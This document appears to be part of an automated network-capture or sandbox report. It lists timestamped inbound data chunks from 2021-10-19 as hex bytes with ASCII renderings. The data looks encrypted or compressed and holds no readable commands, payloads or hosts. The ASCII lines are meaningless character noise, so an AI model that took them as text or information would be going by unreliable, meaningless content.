                                                                                                                                                                                2021-10-19 05:23:31 UTC12INData Raw: 74 8d 31 71 41 62 3f 91 88 9b 3d aa c9 e5 34 87 35 1e c7 8a 0f 7e 27 0a 6d 73 9c 7b 29 6d 5e 67 71 c3 8c 1d 1b 1b 31 31 81 f6 8a 6c 75 5f ab 92 6b ff ed ee 7c 7b 2a 53 8c 5e 0e b6 fe 45 df 89 1e 36 c2 f3 17 d4 7e f7 9f ed eb 5b 13 2c 24 a6 9a 3a a9 1c 3c 14 22 28 ec 30 90 df f9 e4 54 df af 6b 59 7d 92 2b db da 9b 04 43 eb 15 4d 4b d8 90 c0 26 7b 21 60 fd 4f 13 f6 de 9b 0a 03 ce 76 b6 d4 2d e2 3b c0 4c 08 dc 7e 90 22 26 70 8c b5 23 d2 48 2a e5 1c d3 a3 50 95 f5 d6 76 e2 95 58 91 82 96 cd 0e 2d ea 2c 0b a6 10 21 3c 7c f5 9b 8b 88 fe b9 ba 79 ce 29 ff 77 d2 13 89 6d 8c bb 4f 14 52 d9 ec 20 2a 7f 24 9b bb 15 37 38 ce 53 1a 0f 50 8d 6a 87 66 5a 9b 22 4d 69 0c 6e f8 07 76 9a de b9 eb 72 2f e5 8e ba b3 fc eb 3a e0 7c ba 6b 7d 2c be 87 65 ed 24 26 ec 20 24 26 5f
                                                                                                                                                                                Data Ascii: t1qAb?=45~'ms{)m^gq11lu_k|{*S^E6~[,$:<"(0TkY}+CMK&{!`Ov-;L~"&p#H*PvX-,!<|y)wmOR *$78SPjfZ"Minvr/:|k},e$& $&_
                                                                                                                                                                                2021-10-19 05:23:31 UTC13INData Raw: 61 9b 45 1b 86 4c da 5c 44 00 cd 5e a8 ce 3a 10 8d 1a 67 56 a1 51 74 0c aa 20 72 79 16 9a 76 12 1f d4 56 de 14 fe d3 1d a6 ad db a8 0c de d3 85 de d4 f0 d3 f3 37 6e a8 8c f2 2d a7 24 15 a2 0a 90 4a d3 47 62 79 1f 6a 1a 23 d0 23 39 d7 46 a3 4a e9 40 f9 fe 20 0e 58 35 a9 24 1f a8 74 42 6c de 82 62 14 54 ad b0 4f ec a9 07 01 29 b5 71 92 1a 02 be 4f 59 6e a3 45 39 aa 87 be a0 5e 74 d0 35 fb 5f ea 2a 9a 6a 41 86 ca 85 22 bd 6a e5 65 0d 17 88 3e 80 3e 2a f8 f4 c0 99 21 be 7a 1f a4 83 91 19 65 b2 3c a1 ee e7 58 68 ef ba e7 46 ef 98 87 0d 1c 2e a7 e5 99 6d 73 35 a1 6c f4 77 45 98 ea 8b 10 a9 f4 b6 bc e6 d2 12 d1 a6 ce 29 ba 66 42 41 91 fb 15 38 cd 47 33 cf 06 7b 49 fb ee 80 67 96 1d 47 c6 15 04 b3 7f 26 72 ce b8 0e 5c 1f 60 6b 25 5f 00 66 75 23 c5 87 5b 60 cb 52
                                                                                                                                                                                Data Ascii: aEL\D^:gVQt ryvV7n-$JGbyj##9FJ@ X5$tBlbTO)qOYnE9^t5_*jA"je>>*!ze<XhF.ms5lwE)fBA8G3{IgG&r\`k%_fu#[`R
                                                                                                                                                                                2021-10-19 05:23:31 UTC15INData Raw: 11 0b 1a 80 18 ea c4 da a9 fa 72 8d 17 8f 98 da 41 05 b7 3a 94 0e be 5c f1 8d 6b fa ed ea a8 a5 26 8f dc da a6 50 14 89 85 54 14 ec f0 78 7a 64 6e 76 fe 90 29 07 da 57 a8 47 84 95 41 2c 30 06 71 fd 23 71 2c 6d 0d 83 41 e4 ed 72 59 86 0b 88 2a ce 32 a8 c9 35 5b 90 47 78 04 8b 51 6f 62 86 af 75 b7 0b 60 e4 f2 bc bd 07 44 b3 e9 2a 01 54 04 d9 e4 2c 5a 6f 23 84 50 7d d5 6d ac 5a 1c 79 4f 48 b7 aa 20 2d bc db dd 5f ee 86 8e ed 4c a1 58 a4 0a 58 86 ef 90 7d 2c a2 74 a2 40 26 73 5a 7e 07 7e 94 d2 37 95 3d 7a 6f a0 75 06 ce ac 35 44 7f 7b f5 58 b6 14 30 d1 77 0a 4d 73 d7 3c c6 50 17 ac 8d b5 37 2e 11 51 aa 55 e8 e0 da 15 f5 60 0e 25 9e d0 7f c9 65 04 5f ad 5b 62 10 fc 24 fd ff f9 a0 d3 a7 24 6d 17 5d e0 07 fe ba cd 8f 86 ed 14 74 d9 5a 7a 0e 2b ef 7a 59 16 ee 2e
                                                                                                                                                                                Data Ascii: rA:\k&PTxzdnv)WGA,0q#q,mArY*25[GxQobu`D*T,Zo#P}mZyOH -_LXX},t@&sZ~~7=zou5D{X0wMs<P7.QU`%e_[b$$m]tZz+zY.
                                                                                                                                                                                2021-10-19 05:23:31 UTC16INData Raw: 07 a4 80 65 a8 30 73 5e e3 32 a2 60 6c 9d e8 0c 59 0d 4b 5c 59 2b 7e c2 87 4c e0 53 57 45 2c 4c 17 9b 68 2a d8 20 2d 53 27 ff d6 07 0e ac 1e 29 d2 30 1a 59 18 fc 58 cd 2a 27 7e a4 86 16 71 a6 99 46 6c 68 c1 0c fc c3 6b 3a 28 ba 8c 47 74 d6 1b 1c 73 41 18 ef 0e 34 72 26 af 9e d1 a2 67 c1 72 cc c1 a8 77 67 2e 57 62 8e 31 d9 63 91 9c 54 df 35 0f 47 76 6b 50 9c 17 c1 6e 40 28 24 e6 11 38 6d 70 20 5e 24 35 e1 c3 84 43 2b 3a 12 d1 6b 58 c3 e5 29 0a db 87 b7 d3 26 7e 76 77 ae 14 8b 27 ef 12 8b ea a3 e2 00 52 1d 79 e1 8d 8b e6 e1 69 b7 20 52 8f 22 d0 58 92 81 26 05 fd 86 f5 40 1c 59 80 95 60 cc bd d6 1b 4e ad 7a 03 a5 0e 9a 02 23 e5 2e ac 5f ac 9a 1f eb 58 26 38 f8 e8 18 c9 88 00 72 a7 af 68 fd 57 48 3b d9 67 28 80 c3 48 2d 41 bd 5f 43 c7 cb 3b 70 0d 54 4c 3a d1
                                                                                                                                                                                Data Ascii: e0s^2`lYK\Y+~LSWE,Lh* -S')0YX*'~qFlhk:(GtsA4r&grwg.Wb1cT5GvkPn@($8mp ^$5C+:kX)&~vw'Ryi R"X&@Y`Nz#._X&8rhWH;g(H-A_C;pTL:
                                                                                                                                                                                2021-10-19 05:23:31 UTC17INData Raw: 95 59 c8 b9 10 85 8f 6d a3 72 c2 59 b5 4f 0b 5d ca 86 17 76 64 4e 40 94 e9 7c be e6 f1 98 98 1b 50 e0 d3 1d 8e 4f 81 d1 30 ef 57 d3 2a 58 76 7a 6f db d8 6b bc 1f ed 27 69 24 b1 8f 83 d2 54 08 99 aa 71 37 81 1c 31 67 6f a5 8b da 77 4d a8 0a 0b 13 90 ae 24 19 45 7b de 7f dc 7d 24 61 78 85 3c e3 51 47 7c 4f ee dc 1c 5b 81 93 79 4a ae 12 66 34 24 5e 6a 99 93 c5 19 b2 2c aa 20 22 28 3a 44 99 26 95 b7 79 10 b5 5b e5 f5 6b 45 ae 18 a9 29 87 02 7a 70 a5 e4 aa c7 1b c6 2d 70 b3 27 06 6d 47 5c 89 1d 09 f1 75 c4 b3 75 af c4 89 4b 5d 03 02 3c 6b 4c ca 6d 65 86 8d 3c 79 31 5f cc 7a 3c 3e 9f c3 01 90 7b 5f 68 7f 32 7c 6b 67 ce f2 d2 0d 0f aa 87 90 bc 1f 3f f0 77 ae ff 59 67 a4 85 1e 63 23 af 6e f4 e6 c0 25 ff d7 d4 fe 3b 16 bb 60 ee d3 91 38 0a 5f 2f 6c d4 3a 76 25 81
                                                                                                                                                                                Data Ascii: YmrYO]vdN@|PO0W*Xvzok'i$Tq71gowM$E{}$ax<QG|O[yJf4$^j, "(:D&y[kE)zp-p'mG\uuK]<kLme<y1_z<>{_h2|kg?wYgc#n%;`8_/l:v%
                                                                                                                                                                                2021-10-19 05:23:31 UTC19INData Raw: 82 5e b5 71 b0 5b b7 31 86 46 86 c0 2c b4 02 0c 43 1b 11 9c d0 dd a8 21 25 f8 a4 5d 87 38 77 8d fc 55 b4 13 0b 99 bc 01 32 57 ea f5 aa 2a 43 c0 4d 57 41 e0 1d 59 d2 c5 24 f5 22 c7 4d ca 51 1e 85 7b 98 c8 6e 1f e6 e6 ff 57 62 1b 5f f9 41 63 b6 5e a0 ed 47 7b 62 26 0a f1 53 46 c5 d0 2d 56 b5 8f 77 18 54 c4 7e a1 02 f5 eb 12 18 23 ef 12 13 5a 65 ef e8 f4 18 29 6a 45 8c 0e 7e 7e 2b 57 f8 f0 65 68 f6 0f 48 c8 ed b4 a4 22 6e 14 e5 03 77 1c f7 04 60 72 fe 91 1d ae 27 fe 29 0c 8c ea 29 ca 21 46 8a 04 05 d2 fe 18 48 54 f6 f7 68 36 2d da 3d e7 e2 9a 86 30 69 32 8a fb d1 45 37 49 85 56 a2 11 13 89 74 1d 75 39 a2 b6 4f 15 e4 6a 43 18 30 29 e7 ee f6 c4 5f 5b 16 2d 50 1c 6a a3 9e f5 f5 f9 8f 35 fb e2 0d dc 54 5d 5a 90 1d 1c 86 f7 9f 24 72 46 b0 35 5f 82 e3 bb 6d 42 f9
                                                                                                                                                                                Data Ascii: ^q[1F,C!%]8wU2W*CMWAY$"MQ{nWb_Ac^G{b&SF-VwT~#Ze)jE~~+WehH"nw`r'))!FHTh6-=0i2E7IVtu9OjC0)_[-Pj5T]Z$rF5_mB
                                                                                                                                                                                2021-10-19 05:23:31 UTC20INData Raw: 0a a2 36 36 56 84 3b 79 f8 6c ca f1 d8 d0 75 8b 97 16 b8 43 49 75 14 ea 44 2f 88 37 0d 55 7b 1e 5b 17 a0 75 e5 6d d5 7a 71 89 91 95 7e ba 2f 2d 83 4d dc e6 2e 0b 4b b7 37 7f 10 75 31 81 42 dc c3 8a 49 a6 dd c6 b4 a3 19 de 96 00 91 f0 a0 46 4d 5d 49 38 74 65 b8 45 34 2b 04 58 76 a1 8f 8a 34 c1 f7 31 be 9e 16 6c ff d6 6f f4 99 14 e4 dd fb 6c 75 8e f9 57 13 a0 aa 02 56 2f 60 3a a3 eb b0 af c6 31 9b 74 94 ba 26 98 c2 a5 dd 93 29 c5 46 42 d4 f4 9b fb f9 07 6c 25 27 dd 57 6a 0c 27 14 89 d7 a5 3e e0 1f 6c 6b 0b 93 9b 58 cd c8 87 24 50 01 a9 48 b3 6d 78 a9 48 ce 93 ec 67 ba 79 5a 1d 89 d1 cd 1f 83 83 73 58 43 60 0e 86 1c 5d 9d 1d d0 fb ad d6 7c 4f 32 e3 e9 82 29 84 21 79 25 4c c5 7a 30 e1 f9 24 bf 4a ac 32 5f 46 9d f3 9e a0 51 ea 83 20 b1 19 4f 8c dc ef 41 9e 50
                                                                                                                                                                                Data Ascii: 66V;yluCIuD/7U{[umzq~/-M.K7u1BIFM]I8teE4+Xv41loluWV/`:1t&)FBl%'Wj'>lkX$PHmxHgyZsXC`]|O2)!y%Lz0$J2_FQ OAP
                                                                                                                                                                                2021-10-19 05:23:31 UTC21INData Raw: 87 50 e1 40 64 0c 40 64 13 77 de 2b 1a c8 83 59 63 4c de 80 11 ab 61 45 86 a8 36 0a f1 ce 71 a9 9a 0e 29 52 77 0b 7d b7 cb 52 1e 43 76 94 d1 da 3e 23 1c c8 5b 84 7c 5c 48 13 6a 60 62 1e 36 a5 10 a5 1a 31 c6 c7 82 15 b9 20 07 ce 0b 8f 2e 22 a3 23 28 41 b2 e7 bd 37 6f 39 50 b8 be 4d 07 8d d6 7c 40 7d 63 22 63 73 36 24 64 dc f4 ba 8b 5f 5f 36 40 f8 42 3e ec 6c 15 ec 82 e5 a0 a5 51 6e 43 0b 7c 84 b2 c1 4d cd b7 ca 4f 22 c0 e8 01 4a 0c af 80 c1 6d 31 6e 4e 1f 33 47 20 76 e5 e9 84 2a db 72 6f fc 3a b2 99 bf 0d b1 67 86 2f bc 51 f3 58 6e f9 52 48 88 02 59 5a 9c e9 2a 6e 98 8c 93 79 07 2d 43 da 7f 2f 41 af 80 7a 0a 2e 4d 3c 3c 14 86 81 6f 09 e7 65 5e 87 d3 fa 01 d8 24 a4 ff 7a b5 a9 7e 02 82 88 46 b8 fe 43 d6 c1 77 73 ed 96 35 61 a8 7b ab 83 77 c6 81 59 50 9e da
                                                                                                                                                                                Data Ascii: P@d@dw+YcLaE6q)Rw}RCv>#[|\Hj`b61 ."#(A7o9PM|@}c"cs6$d__6@B>lQnC|MO"Jm1nN3G v*ro:g/QXnRHYZ*ny-C/Az.M<<oe^$z~FCws5a{wYP
                                                                                                                                                                                2021-10-19 05:23:31 UTC23INData Raw: 76 40 56 21 c4 9d 3e 97 cf 67 fb ea 07 36 94 46 1e 59 df bd 9a 69 3e 3d 10 88 f0 3f a8 2c bd fc 23 5b 7f 7e 25 76 f7 d3 bf a7 ed 63 c1 48 1f 7c 6e d2 8d ce 63 48 44 ad 9f d8 8b 46 34 d3 d3 a3 d7 4c 73 93 ba 1d 00 fe 55 b1 0f 40 e9 a0 7c 1e b6 59 dd e4 e0 3d 01 e0 71 62 1a 13 2a da fd 01 8f d2 21 d2 53 19 a0 46 33 a6 c4 06 88 e9 ac d6 3a f2 fb 35 70 d4 31 ff a8 2f 41 87 c6 98 ce 2c 9a cf c3 7a 37 38 a6 b6 1b 86 33 31 5d e6 40 77 76 b5 b3 3c 61 1d 78 0a f0 df 9f e2 8c 83 ab 5c 82 c5 72 1d 4a df de 75 3b b7 be b3 91 a0 0d ca 32 26 61 3c cb 34 df b5 35 7b d1 28 d8 6a f7 4c 14 68 3d 5e 38 16 44 96 a5 05 75 ec 7f 7c 7c 67 9d d4 28 98 93 03 99 b3 af 4c 8f fb 70 72 8e 70 a1 5e 69 32 bf 2c 87 5b 48 c2 22 bc d3 c9 12 da 14 da e6 df e3 d4 2c d3 6c 59 b0 2e 61 4b c1
                                                                                                                                                                                Data Ascii: v@V!>g6FYi>=?,#[~%vcH|ncHDF4LsU@|Y=qb*!SF3:5p1/A,z7831]@wv<ax\rJu;2&a<45{(jLh=^8Du||g(Lprp^i2,[H",lY.aK
                                                                                                                                                                                2021-10-19 05:23:31 UTC24INData Raw: f6 c0 11 27 cd 8b da 47 d9 8b db 34 b5 f1 3c f4 a0 a0 60 14 f4 3b 3e b1 10 8e 5f 0b 78 4e f6 21 84 a9 25 5c d8 72 0c df 55 b0 10 a8 6a 73 25 9e e4 3e 8f ab a0 5b b1 5f 7b 99 bc 35 7d ef 0b c0 1a 9a 0c f9 e2 d5 fa 67 0f 96 de ac cb 01 14 40 79 5e 75 f9 32 bc 6a 04 0b 20 8b 81 16 56 bb 95 70 01 f9 33 1d 27 b8 8c b5 54 5b bf 08 f0 e6 0b 44 db fb 1d eb eb 6a a1 d8 30 70 01 64 29 24 3a f5 48 d2 67 2f 96 5f dd 02 08 24 d7 f7 ab d9 8f 95 c5 1f 0b ea bc cd 27 94 87 5d 79 f1 7e 55 28 7d 55 6a 31 96 62 8e 2d 95 16 db 9f b6 8b 28 7b 61 ac d7 f0 d4 90 d4 45 e8 4d 65 09 62 f7 58 c5 34 49 4c 8d f7 20 ff fb c3 7f 5e 18 fa 67 94 b0 f0 01 c9 61 6a 62 1a 25 ff 31 14 43 a7 e5 23 d2 25 3a 0a fb bf 00 d4 64 29 f9 d5 35 21 40 0c 6f ac e5 b7 51 70 d9 51 90 d5 35 38 43 f2 ce 70
                                                                                                                                                                                Data Ascii: 'G4<`;>_xN!%\rUjs%>[_{5}g@y^u2j Vp3'T[Dj0pd)$:Hg/_$']y~U(}Uj1b-({aEMebX4IL ^gajb%1C#%:d)5!@oQpQ58Cp
                                                                                                                                                                                2021-10-19 05:23:31 UTC25INData Raw: 06 4f 61 75 f7 d9 d7 c0 6f 01 2d 4a b9 4b 27 6d f1 54 3f 65 1d bc da 61 59 51 0c 91 52 75 eb 9a 90 2a c6 64 ed b8 c0 1f c6 0c 2a 1c bf 26 6e ae 01 73 ba 6d 52 ce 94 8c 45 e6 e1 5d cd 56 d4 69 32 d2 a5 4b af 4a d1 83 5b 67 5d 7e 0e 5f 0f c3 3a 3f 2d b2 94 07 9b 91 ad e7 6f c4 8c ff 46 40 8d 5c 04 85 5c f3 24 7a 41 df 97 b8 5b 3a b2 1a b7 5d 3a f2 f9 9b ae 6d 04 8b 25 32 39 ac 24 65 77 6c bd 7e 8c da 9f 0b 82 8c 3a 43 85 8d 89 3e 5e 57 13 26 45 d5 f7 01 72 b3 fb 83 2e d5 22 ba d8 86 23 2e 2a 55 13 2a ad 79 23 72 74 1a ea 68 55 7a 13 46 68 c1 a9 dc 82 f5 fe 33 d3 13 ac 71 98 44 81 59 cd 77 74 d6 b0 fc fd 79 15 e7 99 01 88 10 95 c6 e8 aa 2c 40 8e 8a 17 80 37 5e 38 98 86 8e 1a fa fb b1 75 40 db 9c a7 ba 8c a9 ba 24 22 92 dd fe 91 fb c6 da 7f 05 bd b2 27 c2 46
                                                                                                                                                                                Data Ascii: Oauo-JK'mT?eaYQRu*d*&nsmRE]Vi2KJ[g]~_:?-oF@\\$zA[:]:m%29$ewl~:C>^W&Er."#.*U*y#rthUzFh3qDYwty,@7^8u@$"'F
                                                                                                                                                                                2021-10-19 05:23:31 UTC27INData Raw: 32 62 45 17 57 f4 34 b5 80 17 31 df fb cd 5d bf fb 1e 95 90 8f 87 d8 5f 24 70 21 e5 26 84 67 52 2f 77 3c ba 8a c2 bb ed 5f 8a 3a 56 a4 ab 80 bd d7 83 75 01 67 93 27 52 8c 07 39 6f 5b 92 c6 31 b7 13 42 b8 e9 85 1b 89 f8 19 d6 76 89 6f 39 92 1f 39 76 cc 2a 31 51 e3 30 51 29 3f 26 5e 4a c4 a2 e4 6f 24 a3 cc 83 6d 02 9d 9a 0d b3 34 85 c7 f6 37 43 94 19 c0 d9 21 8e 7a 7c 42 b8 25 35 3a da 12 75 24 0f 46 95 c1 1f 13 08 5c f5 5b 5a 50 59 0e 43 34 d7 47 6c 2c cb bc 60 b1 83 76 90 39 dd 86 28 91 60 cf c3 83 b4 0c a0 66 75 60 6c 1f 2d fb 81 b8 b2 e9 99 fe bc d0 da 30 01 f6 aa 20 0a 26 7a e5 5b 36 27 d8 c5 39 93 be b8 50 e9 fc f4 b9 6c 88 86 96 20 d7 f6 7a 86 f9 f8 70 2d fc 66 37 c4 fa ea 14 f4 47 2a bf 7a e4 3b e5 08 00 16 f0 73 5e c5 b3 cb 50 86 fa 09 8e fc 61 1a
                                                                                                                                                                                Data Ascii: 2bEW41]_$p!&gR/w<_:Vug'R9o[1Bvo99v*1Q0Q)?&^Jo$m47C!z|B%5:u$F\[ZPYC4Gl,`v9(`fu`l-0 &z[6'9Pl zp-f7G*z;s^Pa
                                                                                                                                                                                2021-10-19 05:23:31 UTC28INData Raw: 35 06 7a e7 1d 94 d6 c0 09 f3 86 08 0a f9 99 5a f7 83 31 99 60 ea 6b 2a f7 4f 9c 64 df 79 4b 10 c3 1f 78 a4 63 a7 51 5e b0 5b 2d ee fa 67 9d f6 86 66 4c db 42 90 d9 d8 6a 05 b4 9d 8c 7d be f5 b6 e8 2a 6b 27 99 2e 35 14 45 7f 7a b9 4e 10 f1 78 f5 eb 6a c5 6d f4 75 8d 66 dc 9c f1 e7 16 c2 23 17 92 aa 13 18 32 fe 6e f1 8f b6 72 9b 16 8f 90 ad 79 c5 ab 4a 82 6f af e9 06 82 a2 e8 e6 82 d4 a6 0f 3d 56 25 85 c4 79 af 42 7f bb 96 eb 70 c2 ae 20 a7 53 43 da ad 15 4f 47 52 74 de 03 89 e5 76 96 3e 49 61 57 8b 1b 6f 37 9b 1f fd 42 20 5b 7d 66 0e f8 db b7 25 82 e2 01 25 4c 22 28 92 47 4d c1 26 16 a7 95 bd 73 01 b5 78 9e cc 79 1f c1 83 c8 13 fb 5f dc 52 ab fc 3c ea 6c 6b 28 dd 82 c5 74 21 31 f6 75 76 78 7b 04 e6 f5 14 24 e4 11 82 5f 86 f0 f0 4f c3 09 f3 ae a8 53 d2 99
                                                                                                                                                                                Data Ascii: 5zZ1`k*OdyKxcQ^[-gfLBj}*k'.5EzNxjmuf#2nryJo=V%yBp SCOGRtv>IaWo7B [}f%%L"(GM&sxy_R<lk(t!1uvx{$_OS
                                                                                                                                                                                2021-10-19 05:23:31 UTC29INData Raw: 49 c3 76 ac 0d cb 6b 3b 20 c4 12 99 9c cb 81 a1 8c 7a b6 80 af 88 8d f9 79 fe cb 6c 6d f8 49 3f 65 32 f2 e6 98 2b a8 73 33 24 b5 54 bf 21 2e bb 45 34 76 4f 84 9c 43 25 50 52 aa 60 5d 14 8d b7 1c 5d 3d 18 2c 49 b1 1f 08 d0 eb 14 bb f7 57 e8 61 52 aa 26 6d 30 3d 5e 1f 10 e9 f2 e9 dd d0 76 34 bb aa b5 89 4f 83 51 65 60 42 6f 25 88 e6 0b 34 ce 89 37 5a 70 05 67 d2 11 c5 31 a3 40 65 22 f6 ca b9 b9 44 31 b6 a0 da 87 5b b9 57 8b 97 14 a0 db f6 4b 61 4b dd 06 69 b0 c1 89 22 5c 9f d6 e6 31 26 e6 69 56 90 75 85 dd 5f 3d 95 86 4d 46 e8 88 bd e4 56 45 88 38 cf 66 a3 c7 c7 e8 8a c6 8f a7 a7 1e 2b 60 b8 d8 54 d1 cf ec 0d 2f a7 75 d0 3f 14 b0 52 2d 90 07 a9 0f 2c c5 83 b6 97 37 ba 1f ed 5b 5f 1e 7b b1 ca ec 50 b1 62 9f 29 df 1b b9 66 9e 48 b2 c1 87 43 84 17 b6 82 29 b6
                                                                                                                                                                                Data Ascii: Ivk; zylmI?e2+s3$T!.E4vOC%PR`]]=,IWaR&m0=^v4OQe`Bo%47Zpg1@e"D1[WKaKi"\1&iVu_=MFVE8f+`T/u?R-,7[_{Pb)fHC)
                                                                                                                                                                                2021-10-19 05:23:31 UTC31INData Raw: 76 b1 21 5a 75 df b8 7e 72 2c 1e 68 ba d6 5e cf 5a 03 98 20 ae 67 0b 42 22 f9 12 14 4b 82 84 18 8b bf 3c 7d 75 c9 3b bf f3 74 ac a8 44 51 1c 6d 22 19 7b b4 06 fb 70 f4 d8 aa 76 c3 2b 56 0e da 46 fb 11 f2 cd 80 14 86 31 2d 94 7d 8e 5e 9d d9 15 52 7e 70 29 16 1e e0 e6 82 7a 4b a9 51 65 10 5f 26 10 f6 c5 c3 6d 71 ae f2 0a 2d 5f 8f 77 6e 9f ea a0 5d 82 7e 6c 1f 46 8b af bf 41 7f 51 71 5d 13 0e 1c 25 32 09 e1 d9 d8 b0 56 5d 62 1a 50 8b 8e 69 91 2f f0 fb 62 f3 b7 42 bc 8d 62 2f ef 4d 6e a5 f3 98 33 0a fa 0b 57 0b 7f 2e 1b a3 cf 72 bd a4 91 59 c3 63 7b 5c 06 68 34 5e dd 96 1d 31 6a 3a 70 29 17 51 6a 60 12 11 5b fe 09 ec 0d 74 8a 4a 26 c3 34 93 96 de 59 bc eb 2b 81 0d 01 50 16 b4 d5 cd 1c 3e da 58 45 34 6d df 5e 4f 96 9a 1d cc 9b 2e 60 a4 d5 2f e4 3a 1a 58 e2 74
                                                                                                                                                                                Data Ascii: v!Zu~r,h^Z gB"K<}u;tDQm"{pv+VF1-}^R~p)zKQe_&mq-_wn]~lFAQq]%2V]bPi/bBb/Mn3W.rYc{\h4^1j:p)Qj`[tJ&4Y+P>XE4m^O.`/:Xt
                                                                                                                                                                                2021-10-19 05:23:31 UTC32INData Raw: ec e1 bb 88 87 bb 5e 8f ea 28 57 aa e5 c2 80 b2 79 0b e6 26 1a 06 fa 56 4a 90 c9 c1 3a c3 19 64 29 04 68 73 94 4b ba 96 2b 0b 2b 58 59 e1 a8 fe 3d 71 27 29 da 20 91 cc e1 15 ad a8 74 a5 6e 32 6b 3b e5 40 87 d8 28 1f 99 bd 3d 36 d1 3f 98 6d 67 14 8a bc 5a 2a 81 04 8a 70 f5 8b 76 dc c3 8d 99 51 26 91 8e cf ec ff 8c df c3 d9 7e d8 92 2b 0e 0b dd f1 f3 f7 3c 21 76 8b 6c 4a cd 7d 3d 38 75 07 2e 44 5f cc dc 4c aa c3 56 e3 75 5d 9c 98 e6 7b a6 c5 4a b1 30 b3 8b 14 d6 fd d8 c3 44 73 26 09 7f bc b6 23 39 e7 08 90 79 e0 55 25 9d 2c 77 63 04 81 67 22 0c 37 ba 31 e6 5b 8e 6f 4b 32 1d 16 18 59 e0 27 7d 90 4a 29 90 5a 86 fd 35 f6 6f ba e6 31 d5 3a f5 be 6a 04 57 84 83 f4 5d 21 2c af b3 e7 7f 61 6b 30 88 ef 90 5c 24 f1 32 ec f0 d5 6d be 06 39 c2 17 3d b9 f9 f7 7b b9 3c
                                                                                                                                                                                Data Ascii: ^(Wy&VJ:d)hsK++XY=q') tn2k;@(=6?mgZ*pvQ&~+<!vlJ}=8u.D_LVu]{J0Ds&#9yU%,wcg"71[oK2Y'}J)Z5o1:jW]!,ak0\$2m9={<
                                                                                                                                                                                2021-10-19 05:23:31 UTC33INData Raw: d6 e4 32 fa 66 6b 8e dd 48 81 62 83 1b 8b 54 6c a8 44 57 79 0a 59 3f 0a c6 e7 cb 5e ce b9 c4 93 38 a9 01 75 7a 20 23 56 4d 8e 73 2c 76 da 29 91 ba 35 24 f5 17 20 b9 87 6d c1 59 e8 b6 fc fc 12 33 33 c6 db 22 97 c0 63 bc 29 59 76 a3 08 25 47 79 70 c7 f8 1f 98 73 2e 46 2e fd 8e 43 e8 ab 6e 8d 6b 3e 7f 0c e5 68 76 28 81 d5 58 07 d6 31 98 0c 67 45 f7 fa 97 1f c7 49 d7 82 e5 14 8e b1 2c 24 32 4e 8f c9 6d 53 e0 85 9a 78 63 b1 89 4f 1a 22 c6 ee 40 23 99 ff ca aa 95 29 3a 2f 79 2a ce c1 5e 2c ca 79 9c 1a 84 b7 24 7d 9c f4 86 0d ae a4 90 53 76 85 1f 41 80 18 57 66 58 3d 4e 70 e8 9e 00 c4 2c cd 30 be 12 a4 b0 c4 ec bc 87 eb 80 1b e2 9a 7c 3e cd 56 ae 24 51 9a 2f 19 57 76 eb 9e 63 06 b6 69 28 5d 46 3e 72 d9 f2 22 c6 2b 10 fe ec c6 98 1b 71 ce 0b 25 28 96 a1 6b 8d ee
                                                                                                                                                                                Data Ascii: 2fkHbTlDWyY?^8uz #VMs,v)5$ mY33"c)Yv%Gyps.F.Cnk>hv(X1gEI,$2NmSxcO"@#):/y*^,y$}SvAWfX=Np,0|>V$Q/Wvci(]F>r"+q%(k
                                                                                                                                                                                2021-10-19 05:23:31 UTC35INData Raw: 2e 90 4f 34 bf 83 d8 14 27 44 8e d1 73 59 2e 50 62 d7 a6 68 84 90 bf 1a fa 78 dc a4 b0 2e 64 b0 92 27 66 17 6a 82 ee 44 df 41 8c 1a 7e e7 38 bb ca 13 0a 20 8a 45 ed 98 bf 28 45 70 73 17 cb d0 3b 43 75 fc a6 b8 c3 bf e5 f1 77 80 7c dc 86 6b 18 14 ea 71 11 3e 01 1f 60 d0 8f 4a e9 5d 86 13 1f 5f 2b ab 67 76 76 c0 1a 3a 8c 13 27 22 76 48 77 ac 37 dd e2 db 10 bd 0f 0e 3e 31 33 01 76 7d 76 0d 59 4a 20 bf eb 13 08 26 fa 73 da df f2 50 89 82 26 9f 20 49 6c b0 6d c1 67 3a f2 70 c5 30 8a 73 2a 41 91 03 8c 0b 66 d2 09 2f 57 8c 75 fc 20 60 bb 14 c2 10 53 d1 06 87 2a 70 7e 9f e3 2a 7d 19 df ee 34 81 47 ed 6c 64 8c b0 cf 86 9a 7c 75 07 aa 5f 2e 48 79 ab d9 d9 d4 9d ff 73 84 b6 2b 39 c0 2d 6b bf b2 52 f5 58 7c 26 fe 33 94 c8 de 29 0f 95 87 6e 1e 4e 81 73 43 b0 e5 dd ba
                                                                                                                                                                                Data Ascii: .O4'DsY.Pbhx.d'fjDA~8 E(Eps;Cuw|kq>`J]_+gvv:'"vHw7>13v}vYJ &sP& Ilmg:p0s*Af/Wu `S*p~*}4Gld|u_.Hys+9-kRX|&3)nNsC
                                                                                                                                                                                2021-10-19 05:23:31 UTC36INData Raw: 7d f6 3d 11 e8 76 a0 07 24 9c fc 0b 6c 40 68 cf 0d 14 be 15 26 bf f1 72 f1 7c 33 a6 40 de 08 c0 ff 52 6d 60 29 c5 23 bc 1f 00 4c 36 a8 d1 6a 91 eb 10 11 70 2b 11 31 c4 ff 63 4a 42 6a 59 15 6b f4 4f c4 48 ff 10 fb 5f 96 3e c2 f3 f5 50 67 0b 10 5a d4 84 b0 58 7e 66 0d bc 3f 94 a7 a5 1d e4 fa 5e 81 71 6f a9 1f 74 22 0c 23 3c 06 c0 29 0b e7 5a 3a 55 d6 39 a0 fe ac 3a 3f d8 1e 2b c7 3b fe 66 42 bb 41 a7 3c 16 ff 8b ef 2f b7 84 73 e6 4b a9 4e e6 d6 4c 54 83 a0 da 64 20 31 44 fb 66 d1 02 79 aa 1b 28 c1 be 15 a6 3c 9c d8 f9 0e 38 31 e8 8e 01 33 31 24 6f d3 2c 30 a6 58 63 21 6c 9d 35 c8 75 bd cf 2b f0 52 69 01 62 af 13 f0 89 d9 d2 08 6d 76 26 b1 a2 c2 4b 1d 47 6b 9f 18 96 3a 12 74 cc 3d 46 fd d7 ea bd f1 96 39 6f 6d a0 96 b8 a8 b2 4b 97 5e 1c 0c 1c 78 27 60 d6 11
                                                                                                                                                                                Data Ascii: }=v$l@h&r|3@Rm`)#L6jp+1cJBjYkOH_>PgZX~f?^qot"#<)Z:U9:?+;fBA</sKNLTd 1Dfy(<8131$o,0Xc!l5u+Ribmv&KGk:t=F9omK^x'`
